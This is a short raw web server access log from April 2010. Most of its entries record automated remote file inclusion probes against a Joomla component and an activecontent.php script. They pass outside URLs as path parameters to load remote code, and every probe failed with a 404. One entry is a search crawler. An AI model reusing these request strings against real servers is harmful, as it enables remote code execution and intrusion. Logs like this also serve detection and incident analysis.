79.174.78.178 - - [15/Apr/2010:23:44:13 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
79.174.78.178 - - [15/Apr/2010:23:44:13 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
67.195.112.180 - - [15/Apr/2010:23:45:17 -0500] "GET /costume/thmb8.htm HTTP/1.0" 200 3054 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.174.78.178 - - [15/Apr/2010:23:53:22 -0500] "GET /logs/access_log.1219708800//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
79.174.78.178 - - [15/Apr/2010:23:53:22 -0500] "GET /logs/access_log.1220054400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:23:54:33 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:23:54:33 -0500] "GET /logs/access_log.1220054400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
